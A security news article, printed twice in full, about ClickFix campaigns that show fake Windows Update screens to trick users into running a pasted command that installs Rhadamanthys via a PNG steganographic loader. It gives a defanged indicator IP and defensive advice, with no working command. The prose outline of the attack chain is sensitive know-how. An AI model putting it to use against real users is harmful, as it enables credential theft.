Emerging Threats in Cybersecurity: The ClickFix Attack Trend
A notable surge in ClickFix attacks is currently raising alarms in the cybersecurity community, as attackers employ deceptive Windows update screens to lure victims into unwittingly downloading infostealer malware. This sophisticated social engineering tactic exploits users’ trust, prompting them to execute harmful commands on their own devices under the guise of necessary system updates.
ClickFix has become the predominant method for initial access among cybercriminals, as reported by Microsoft. Over the past year, both state-sponsored actors and organized crime groups have increasingly utilized this technique to distribute malware.
Recent analyses by Huntress security experts, Ben Folland and Anna Pham, reveal a shift in tactics, moving away from traditional robot-check prompts to “highly convincing” fake Windows update screens. This evolution in strategy highlights the attackers’ adaptability and the growing sophistication of their methods.
In a particularly innovative twist, these cyber adversaries are leveraging a steganographic loader to deliver infostealing malware, such as Rhadamanthys. This technique encodes malicious code within the pixel data of PNG images, utilizing specific color channels to reconstruct and decrypt the malware directly in memory. Such methods not only enhance the stealth of the payloads but also help them evade detection by signature-based security systems.
Between September 29 and October 30, 2025, Huntress investigated 76 incidents linked to this campaign, affecting a diverse array of organizations across the US, EMEA, and APJ regions. One notable incident involved traffic from the IP address 141.98.80[.]175, which security professionals are advised to monitor closely.
A common thread among these incidents is the first-stage payload, which references a URL featuring a hex-encoded second octet, ultimately leading to the steganographic loader. Victims typically initiate the attack by visiting a malicious website that triggers their browsers to enter full-screen mode, displaying a blue Windows Update screen reminiscent of legitimate system notifications.
If users succumb to the ruse, they are prompted to install a “critical security update” through the familiar ClickFix pattern. This involves opening the Run prompt (Win+R), followed by pasting and executing the malicious command.
This command initiates a multi-stage execution chain, commencing with an mshta.exe command that contains a URL with a hex-encoded IP address. This process runs PowerShell code that dynamically decrypts and reflectively loads a .NET assembly, which subsequently deploys another .NET payload—a steganographic loader that extracts Donut-packed shellcode concealed within the pixel data of PNG images. Ultimately, these ClickFix lures lead to the installation of Rhadamanthys infostealing malware, which stealthily captures users’ login credentials.
While the identity of the perpetrators remains unknown, Huntress researchers have noted that comments within the source code of the Windows Update lure site are written in Russian. Their analysis was conducted both before and after the Operation Endgame law enforcement actions announced on November 13, which targeted the infrastructure supporting Rhadamanthys.
As of November 19, multiple active domains continue to host the Windows Update Lure page associated with the Rhadamanthys campaign. All these lures reference the same hex-encoded URL structure previously linked to the malware’s deployment, although it appears that the payload is no longer being actively hosted.
Organizations can bolster their defenses against ClickFix attacks by implementing measures such as blocking access to the Windows Run box and educating employees about the ClickFix technique. It is crucial to emphasize that legitimate CAPTCHA or Windows Update prompts will never require users to paste and execute commands. Furthermore, employing endpoint detection and response tools can help monitor for suspicious activities, such as explorer.exe spawning mshta.exe or PowerShell processes with unexpected command lines.
New ClickFix attacks use fake Windows Updates to swipe creds
Emerging Threats in Cybersecurity: The ClickFix Attack Trend
A notable surge in ClickFix attacks is currently raising alarms in the cybersecurity community, as attackers employ deceptive Windows update screens to lure victims into unwittingly downloading infostealer malware. This sophisticated social engineering tactic exploits users’ trust, prompting them to execute harmful commands on their own devices under the guise of necessary system updates.
ClickFix has become the predominant method for initial access among cybercriminals, as reported by Microsoft. Over the past year, both state-sponsored actors and organized crime groups have increasingly utilized this technique to distribute malware.
Recent analyses by Huntress security experts, Ben Folland and Anna Pham, reveal a shift in tactics, moving away from traditional robot-check prompts to “highly convincing” fake Windows update screens. This evolution in strategy highlights the attackers’ adaptability and the growing sophistication of their methods.
In a particularly innovative twist, these cyber adversaries are leveraging a steganographic loader to deliver infostealing malware, such as Rhadamanthys. This technique encodes malicious code within the pixel data of PNG images, utilizing specific color channels to reconstruct and decrypt the malware directly in memory. Such methods not only enhance the stealth of the payloads but also help them evade detection by signature-based security systems.
Between September 29 and October 30, 2025, Huntress investigated 76 incidents linked to this campaign, affecting a diverse array of organizations across the US, EMEA, and APJ regions. One notable incident involved traffic from the IP address 141.98.80[.]175, which security professionals are advised to monitor closely.
A common thread among these incidents is the first-stage payload, which references a URL featuring a hex-encoded second octet, ultimately leading to the steganographic loader. Victims typically initiate the attack by visiting a malicious website that triggers their browsers to enter full-screen mode, displaying a blue Windows Update screen reminiscent of legitimate system notifications.
If users succumb to the ruse, they are prompted to install a “critical security update” through the familiar ClickFix pattern. This involves opening the Run prompt (Win+R), followed by pasting and executing the malicious command.
This command initiates a multi-stage execution chain, commencing with an mshta.exe command that contains a URL with a hex-encoded IP address. This process runs PowerShell code that dynamically decrypts and reflectively loads a .NET assembly, which subsequently deploys another .NET payload—a steganographic loader that extracts Donut-packed shellcode concealed within the pixel data of PNG images. Ultimately, these ClickFix lures lead to the installation of Rhadamanthys infostealing malware, which stealthily captures users’ login credentials.
While the identity of the perpetrators remains unknown, Huntress researchers have noted that comments within the source code of the Windows Update lure site are written in Russian. Their analysis was conducted both before and after the Operation Endgame law enforcement actions announced on November 13, which targeted the infrastructure supporting Rhadamanthys.
As of November 19, multiple active domains continue to host the Windows Update Lure page associated with the Rhadamanthys campaign. All these lures reference the same hex-encoded URL structure previously linked to the malware’s deployment, although it appears that the payload is no longer being actively hosted.
Organizations can bolster their defenses against ClickFix attacks by implementing measures such as blocking access to the Windows Run box and educating employees about the ClickFix technique. It is crucial to emphasize that legitimate CAPTCHA or Windows Update prompts will never require users to paste and execute commands. Furthermore, employing endpoint detection and response tools can help monitor for suspicious activities, such as explorer.exe spawning mshta.exe or PowerShell processes with unexpected command lines.